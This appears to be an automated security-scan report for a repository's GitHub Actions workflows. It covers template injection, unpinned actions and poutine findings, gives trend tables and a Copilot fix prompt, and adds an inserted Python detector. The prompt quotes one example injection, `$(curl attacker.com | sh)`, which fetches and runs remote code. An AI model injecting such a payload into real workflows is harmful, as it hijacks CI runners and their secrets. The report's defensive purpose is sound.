Today's compilation failed with unknown flag: --runner-guard — the same failure seen on 2026-04-08 (3 consecutive failures). This report is based on the last successful scan: 2026-04-04 (§23986109480).
Scan Status: ⚠️ Compile failed today — data from last successful scan (5 days ago)
Note on runner-guard: The --runner-guard flag was introduced in PR #25281 but has not yet been merged into the deployed gh-aw CLI/MCP server version. Compilation has failed on every run since 2026-04-08. Runner-guard findings are unavailable until the flag is deployed.
Findings by Tool (2026-04-04 baseline)

| Tool | Total | Critical | High | Medium | Low |
|---|---|---|---|---|---|
| zizmor (security) | 4,924 | 0 | 1,117 | 3,703 | 104 |
| poutine (supply chain) | 65 | 34 | 14 | 17 | 0 |
| actionlint (linting) | 4,967 | — | — | — | — |
| runner-guard (taint analysis) | N/A | — | — | — | — |
Clustered Findings by Tool and Type

Zizmor Security Findings

| Issue Type | Severity | Count | Notes |
|---|---|---|---|
| secrets-outside-env | Medium | 7,398 occurrences / 4,924 findings | Affects all 181 workflows |
| unpinned-uses | High | 2,182 | All 181 workflows via github/gh-aw-actions/setup@v0.65.6 |

Top Priority Issues

1. Template Injection (High Severity)
Tool: zizmor
Description: Code injection via GitHub Actions expression template expansion in `run:` steps — attacker-controlled values from `github.event.*` or PR/issue data used directly in shell commands
Reference: (docs.zizmor.sh/redacted)

2. Unpinned Action References (High Severity)
Tool: zizmor
Count: 2,182 findings
Severity: High
Affected: All 181 workflows via github/gh-aw-actions/setup@v0.65.6
Description: Actions referenced by tag instead of SHA — supply chain attack surface

3. Untrusted Checkout Execution (Critical — Poutine)
Tool: poutine
Description: Arbitrary code execution risk from untrusted code in PR checkouts
Reference: (docs.poutine.dev/redacted)
Fix Suggestion for Template Injection

Issue: Template injection via `${{ github.event.* }}` in `run:` steps
Severity: High
Affected Workflows: ~47 workflows
Prompt to Copilot Agent:
You are fixing a security vulnerability identified by zizmor: template injection.
**Vulnerability**: template-injection
**Rule**: (docs.zizmor.sh/redacted)
**Current Issue**:
GitHub Actions expressions like `${{ github.event.pull_request.title }}` or
`${{ github.event.issue.body }}` are expanded directly into shell `run:` steps.
An attacker can craft a PR title or issue body containing shell metacharacters
(e.g., `$(curl attacker.com | sh)`) that get executed in the runner.
**Required Fix**:
Move the GitHub expression into an environment variable, then reference that
variable in the shell command. Environment variables are passed safely and are
NOT subject to shell injection.
**Example**:
Before:
```yaml
- name: Process PR title
  run: echo "${{ github.event.pull_request.title }}"
```
After:
```yaml
- name: Process PR title
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "$PR_TITLE"
```
Apply this fix to every `run:` step that uses a `${{ github.event.* }}`,
`${{ github.head_ref }}`, `${{ github.actor }}`, or similar untrusted
expression directly in the shell command body.
Affected workflow files (lock.yml):
- audit-workflows.lock.yml
- auto-triage-issues.lock.yml
- contribution-check.lock.yml
- copilot-pr-nlp-analysis.lock.yml
- copilot-session-insights.lock.yml
- copilot-token-audit.lock.yml
- daily-code-metrics.lock.yml
- daily-copilot-token-report.lock.yml
- daily-doc-updater.lock.yml
- daily-firewall-report.lock.yml
- daily-integrity-analysis.lock.yml
- daily-issues-report.lock.yml
- daily-multi-device-docs-tester.lock.yml
- daily-news.lock.yml
- daily-performance-summary.lock.yml
- daily-repo-chronicle.lock.yml
- deep-report.lock.yml
- discussion-task-miner.lock.yml
- docs-noob-tester.lock.yml
- github-mcp-structural-analysis.lock.yml
(and ~27 additional workflows)
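To check a workflow file for the pattern this fix targets, before and after the rewrite, here is an added Python detector; it is not part of this report, of gh-aw or of zizmor, and the two workflow snippets are constructed for the example. It is a simplified indentation-based scan over the raw YAML (not a YAML parser, so unusual layouts can be missed) that flags any `${{ github.event.* }}`, `${{ github.head_ref }}` or `${{ github.actor }}` expression inside a `run:` body and names the `env:` variable the fix would move it into.

```python
import re

# Expression contexts the report treats as untrusted inside run: steps (assumption: prefix match is enough).
UNTRUSTED_PREFIXES = ("github.event.", "github.head_ref", "github.actor")
EXPR_RE = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")
RUN_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")

def run_step_bodies(text):
    """Yield (line_number, body) for each run: scalar (simplified indentation scan, not a YAML parser)."""
    lines, i = text.splitlines(), 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        i += 1
        if not m:
            continue
        indent, body, lineno = len(m.group(1)), m.group(2).strip(), i
        if body in ("|", ">", "|-", ">-"):
            # Block scalar: the body is every following line indented deeper than the run: key.
            block = []
            while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
                block.append(lines[i].strip())
                i += 1
            body = "\n".join(block)
        yield lineno, body

def find_template_injection(text):
    """Report each untrusted expression expanded inside a run: body, with the env var name the fix would use."""
    findings = []
    for lineno, body in run_step_bodies(text):
        for expr in EXPR_RE.findall(body):
            if expr.startswith(UNTRUSTED_PREFIXES):
                env = re.sub(r"[^A-Za-z0-9]+", "_", expr.split(".", 2)[-1]).upper()
                findings.append({"line": lineno, "expression": expr, "suggested_env": env})
    return findings

# Constructed sample: the report's "Before" step plus a multi-line run: block (github.event_name is trusted).
VULNERABLE = """\
steps:
  - run: echo "${{ github.event.pull_request.title }}"
  - run: |
      echo "${{ github.head_ref }} on ${{ github.event_name }}"
"""
# Constructed sample: the report's "After" form, with the expression moved into env:.
FIXED = """\
steps:
  - env:
      PR_TITLE: ${{ github.event.pull_request.title }}
    run: echo "$PR_TITLE"
"""
```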
View All Findings Details (2026-04-04 baseline)

Zizmor Severity Breakdown

| Severity | Count |
|---|---|
| High | 1,117 |
| Medium | 3,703 |
| Low | 22 |
| Informational | 82 |
Actionlint Shellcheck Details

SC2086 accounts for 94.2% of all actionlint findings (4,680/4,967).
The predominant pattern is unquoted variable expansions in bash:

```bash
# Before (flagged)
bash ${RUNNER_TEMP}/script.sh
# After (fixed)
bash "${RUNNER_TEMP}/script.sh"
```
Poutine Growth Analysis
Poutine findings grew from 6 (2026-03-29) → 65 (2026-04-04), a 983% increase in 6 days, driven by new workflows triggering the `default_permissions_on_risky_events` and `github_action_from_unverified_creator_used` rules.
Historical Trends

| Date | Total | Zizmor | Poutine | Actionlint | Workflows | Status |
|---|---|---|---|---|---|---|
| 2026-03-29 | 7,383 | 3,455 | 6 | 3,928 | 178 | ✅ |
| 2026-03-30 | 8,520 | 3,953 | 6 | 4,561 | 178 | ✅ |
| 2026-03-31 | 8,562 | 3,977 | 19 | 4,566 | 178 | ✅ |
| 2026-04-01 | 8,601 | 3,992 | 19 | 4,590 | 179 | ✅ |
| 2026-04-02 | 8,600 | 3,762 | 19 | 4,819 | 179 | ✅ |
| 2026-04-03 | 9,757 | 4,789 | 39 | 4,929 | 183 | ✅ |
| 2026-04-04 | 9,956 | 4,924 | 65 | 4,967 | 181 | ✅ Last good |
| 2026-04-08 | — | — | — | — | 0 | ❌ compile_failed |
| 2026-04-09 | — | — | — | — | 0 | ❌ compile_failed |
Trend (last 12 days): Total findings +35% (7,383 → 9,956), workflows +1.7% (178 → 181). Compile failures: 3 consecutive failures since 2026-04-08 — unblocked by merging PR #25281.
Key Observations

- template-injection: Stable at ~214 High findings across ~47 workflows — persistent unresolved
- secrets-outside-env: Pervasive, affects all workflows (~7,398 occurrences)
- unpinned-uses spike: Grew from 5 to 2,182 between 2026-04-02 and 2026-04-04 via github/gh-aw-actions/setup@v0.65.6
- poutine growth: 983% increase in 6 days (6 → 65 findings)
Analysis Summary
Recommendations

- Fix template-injection in the ~47 affected workflows using the fix prompt above
- Pin github/gh-aw-actions/setup to a SHA instead of @v0.65.6
- Address untrusted_checkout_exec in smoke workflow call files
- Address default_permissions_on_risky_events

Next Steps

- Merge PR #25281 to deploy the --runner-guard flag and restore daily scans
- Pin the github/gh-aw-actions/setup action to a specific SHA
- Fix untrusted_checkout_exec in smoke-workflow-call files
- Review default_permissions_on_risky_events and add explicit permissions: blocks